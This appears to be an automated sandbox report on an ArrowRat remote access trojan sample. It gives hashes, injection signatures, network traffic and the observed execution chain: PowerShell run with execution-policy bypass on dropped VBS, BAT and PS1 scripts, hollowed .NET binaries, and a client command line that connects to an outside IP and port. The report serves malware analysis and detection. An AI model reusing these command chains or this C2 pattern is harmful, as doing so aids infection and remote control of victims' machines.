Analysis Overview
SHA256
5295a4068b1de47c3385bd1608f84ef51b4bb8b6e0f867af7797a199da9378dc
Threat Level: Known bad
The file 5ff1aded34d5d6f0635f6f9861436886.bin was found to be: Known bad.
Malicious Activity Summary
ArrowRat
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-05-19 01:26
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-05-19 01:26
Reported
2023-05-19 01:28
Platform
win7-20230220-en
Max time kernel
31s
Max time network
34s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\abf2dcd61f4a9717e372e32dcfcb02831e51130f4a91fa87bb7954785db435fd.ps1
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Unlimited\ISO\Binnot.vbs"
C:\Windows\System32\cmd.exe
cmd /c ""C:\ProgramData\Unlimited\ISO\Binnot.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Binnot.ps1
Network
Files
memory/2040-58-0x000000001B290000-0x000000001B572000-memory.dmp
memory/2040-59-0x00000000022E0000-0x00000000022E8000-memory.dmp
memory/2040-60-0x00000000028F0000-0x0000000002970000-memory.dmp
memory/2040-61-0x00000000028F0000-0x0000000002970000-memory.dmp
memory/2040-62-0x00000000028F0000-0x0000000002970000-memory.dmp
memory/2040-69-0x00000000028F0000-0x0000000002970000-memory.dmp
C:\ProgramData\Unlimited\ISO\Binnot.vbs
| MD5 | 8444901b66d6f83f3a684f1b44646868 |
| SHA1 | 69c9c40aef3734959b4ce5f07005bf13c07646f9 |
| SHA256 | cfeaafc87ceec9986f37f6a42ecfa39260f98c951404df95da5e074141add5da |
| SHA512 | 7493b0d40c9c914c8968b42752b1d14d415e7bccff07f9bf2ab976d77517e12a456f142ee786527c4e536fab3e4156b21ce353f51f5925bbc405937ad7929bbb |
C:\ProgramData\Unlimited\ISO\Binnot.bat
| MD5 | f1d747a7825a5db756d428a5254d244e |
| SHA1 | 7db56fe57492bd856c787cd2a836eff4f2ce5e01 |
| SHA256 | 5863b76caee43b2f1efdd2322f2e5731b1537d1deeb35e860cd75a8304fe4ddf |
| SHA512 | 4b1f63df96b8f9e2a381855974b2efab5bd48ae342b1e29a51661d0514ba6f8e62d23e3e58a9a9f978d39880ab03a9b9bf72ab52a546a965da20daa18c4d246d |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bc56171e5c5e1d408145ec3fc8b3cdc4 |
| SHA1 | f22979ca4218867b13c697eecd267991949a0d9d |
| SHA256 | 7e835320659002c243a14aa35f98b9b244d6191ec4d1fe05dd75834bf396656b |
| SHA512 | 280b322b3a09bc7ed01288c962b180d8436d21eb41d1d8f10f36a2442564b82225b568a9bbf4ba6d84ef8c2b5587230a90004f3ae085708abff195e96691f61b |
memory/1328-79-0x000000001B1D0000-0x000000001B4B2000-memory.dmp
memory/1328-80-0x0000000001EC0000-0x0000000001EC8000-memory.dmp
C:\ProgramData\Unlimited\ISO\Binnot.ps1
| MD5 | 58ef18971b1520648e0c6d67036251ff |
| SHA1 | 68bd1ee657ff233f6a1ee453914aaecdeb845284 |
| SHA256 | 226b14799e579e28954937fa3ffdb7d0e5dcd10360b35c329a7246a23be4b4b3 |
| SHA512 | 9b7f04aca4b3e2af5aafdc9ea30c1722722d668078bea8b0aaa2394d0cb50ac75716fb9173d4084bd5a9cfaa279bd94404b64c140532daa5b3bdd66842f332d2 |
memory/1328-82-0x0000000002754000-0x0000000002757000-memory.dmp
memory/1328-83-0x000000000275B000-0x0000000002792000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-05-19 01:26
Reported
2023-05-19 01:28
Platform
win10v2004-20230220-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
ArrowRat
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1732 set thread context of 3244 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe |
| PID 3244 set thread context of 1620 | N/A | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1675742406-747946869-1029867430-1000\{B05CD583-21C4-4B88-AD2A-A7B36E5F950D} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\abf2dcd61f4a9717e372e32dcfcb02831e51130f4a91fa87bb7954785db435fd.ps1
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Unlimited\ISO\Binnot.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Unlimited\ISO\Binnot.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Binnot.ps1
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Unlimited\ISO\Unlimited.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Unlimited\ISO\Unlimited.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Unlimited.ps1
C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 185.252.178.121 1337 qCDAaGyIF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.202.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.150.43.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.103.197.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.66.64.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.255.255.239.in-addr.arpa | udp |
| IE | 13.69.239.73:443 | tcp | |
| US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.232.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.143.241.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.232.18.117.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.134.221.88.in-addr.arpa | udp |
| NL | 8.238.20.126:80 | tcp | |
| NL | 8.238.20.126:80 | tcp | |
| NL | 8.238.20.126:80 | tcp | |
| US | 8.8.8.8:53 | 254.166.241.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.134.221.88.in-addr.arpa | udp |
| NL | 173.223.113.164:443 | tcp | |
| US | 8.8.8.8:53 | 9.143.101.95.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kl0dbiph.qjs.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3780-133-0x000001FC31060000-0x000001FC31082000-memory.dmp
memory/3780-143-0x000001FC49500000-0x000001FC49510000-memory.dmp
memory/3780-144-0x000001FC49500000-0x000001FC49510000-memory.dmp
C:\ProgramData\Unlimited\ISO\Binnot.vbs
| MD5 | 8444901b66d6f83f3a684f1b44646868 |
| SHA1 | 69c9c40aef3734959b4ce5f07005bf13c07646f9 |
| SHA256 | cfeaafc87ceec9986f37f6a42ecfa39260f98c951404df95da5e074141add5da |
| SHA512 | 7493b0d40c9c914c8968b42752b1d14d415e7bccff07f9bf2ab976d77517e12a456f142ee786527c4e536fab3e4156b21ce353f51f5925bbc405937ad7929bbb |
C:\ProgramData\Unlimited\ISO\Binnot.bat
| MD5 | f1d747a7825a5db756d428a5254d244e |
| SHA1 | 7db56fe57492bd856c787cd2a836eff4f2ce5e01 |
| SHA256 | 5863b76caee43b2f1efdd2322f2e5731b1537d1deeb35e860cd75a8304fe4ddf |
| SHA512 | 4b1f63df96b8f9e2a381855974b2efab5bd48ae342b1e29a51661d0514ba6f8e62d23e3e58a9a9f978d39880ab03a9b9bf72ab52a546a965da20daa18c4d246d |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 223bd4ae02766ddc32e6145fd1a29301 |
| SHA1 | 900cfd6526d7e33fb4039a1cc2790ea049bc2c5b |
| SHA256 | 1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e |
| SHA512 | 648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc |
memory/4584-158-0x0000014FDB660000-0x0000014FDB670000-memory.dmp
memory/4584-159-0x0000014FDB660000-0x0000014FDB670000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 27fdb1beb89b56345e585d480be3026b |
| SHA1 | 2626e41ca27668518d01c04e1579f77027ff31a1 |
| SHA256 | ef8cd66cc241c6d899919ae6f8369334b20202bd4ad49acfa546d29300c533d2 |
| SHA512 | bd8208c8763ad8a6c25b6363b8e0e2a3c694e4e0cabfe4ce5d40945bd1f4274b7da976997f825e95c4455bf6b2e20b5bd960609b172f7c70d3521cb2ab24d49a |
C:\ProgramData\Unlimited\ISO\Binnot.ps1
| MD5 | 58ef18971b1520648e0c6d67036251ff |
| SHA1 | 68bd1ee657ff233f6a1ee453914aaecdeb845284 |
| SHA256 | 226b14799e579e28954937fa3ffdb7d0e5dcd10360b35c329a7246a23be4b4b3 |
| SHA512 | 9b7f04aca4b3e2af5aafdc9ea30c1722722d668078bea8b0aaa2394d0cb50ac75716fb9173d4084bd5a9cfaa279bd94404b64c140532daa5b3bdd66842f332d2 |
memory/4584-171-0x0000014FDB660000-0x0000014FDB670000-memory.dmp
memory/4584-172-0x0000014FDB660000-0x0000014FDB670000-memory.dmp
C:\ProgramData\Unlimited\ISO\Unlimited.vbs
| MD5 | c281573a4f6f6ac5b06f2e9436400093 |
| SHA1 | c2699e56b7c26ac9cdfe1f500b49151b69bd6ad8 |
| SHA256 | 3c312f2547fbc4a3ffe5c1b6d91c03494d7653fd758d886473f2ae6656de11f7 |
| SHA512 | 76aed1be4b48d2fc019c9136eb74b3a96b56b89c74cb3b3347f8eefc592fee24a2a94ea3babd4b394080c7663864781c89afe761e59f8d65aed147d1ed422026 |
C:\ProgramData\Unlimited\ISO\Unlimited.bat
| MD5 | eff64d56c40c54a1f9891d7a6ad54899 |
| SHA1 | dbaf9a4aeb8484690d6118155d59158598f0799a |
| SHA256 | c846b192c5dc974c6d63024a06d4c31b2f7c8baa61af133e5b00009b68df86e2 |
| SHA512 | c89f82c7807b947e10f82740c01d5cb996e95c4a6e79375eee6b981d0ed911d31537e964d0cefef874c7e12f9f4baf237f0f9ed44de866abd3c8030a25b7cc83 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2cacea4e19ddf5755e70346cc1cbe27b |
| SHA1 | d4f7c2950f951857da18cfec490370152983e121 |
| SHA256 | 5488c6f47e2e55addf07b920f0ce43ed970515193c4cb1ffb845a9b441bcd9ad |
| SHA512 | 445497cefd12a10e19272b51028a6b19d039b578a2e4d1f4c7f4c4bed447c55b1cd23453e9bed9307aaeb7b57ea8c721d1884eaaafa422df4607cfe3a75f54f7 |
memory/1732-186-0x000002B7CC7C0000-0x000002B7CC7D0000-memory.dmp
memory/1732-187-0x000002B7CC7C0000-0x000002B7CC7D0000-memory.dmp
memory/1732-188-0x000002B7CC7C0000-0x000002B7CC7D0000-memory.dmp
C:\ProgramData\Unlimited\ISO\Unlimited.ps1
| MD5 | e1bb0ce912e111d3b891de922e21a739 |
| SHA1 | 8ae8856cb82f3340b2b2b1a06b3123b549005549 |
| SHA256 | 5f79c8a3a6ff96ae8ccf96dfc486ae1f5e8edeabb663e6f90be89aeb727457cc |
| SHA512 | bbb85cb9160a52d1bf464b7b459caaf9f808407031c423790be65e820fc8cce39c99c6096110228e8a8b33ddf5bff75350cbda2f6b01fc500f5169a4142528bf |
memory/3244-190-0x0000000000400000-0x000000000042C000-memory.dmp
memory/3244-192-0x0000000005460000-0x0000000005A04000-memory.dmp
memory/3244-193-0x0000000004F50000-0x0000000004FEC000-memory.dmp
memory/1620-194-0x0000000000400000-0x0000000000418000-memory.dmp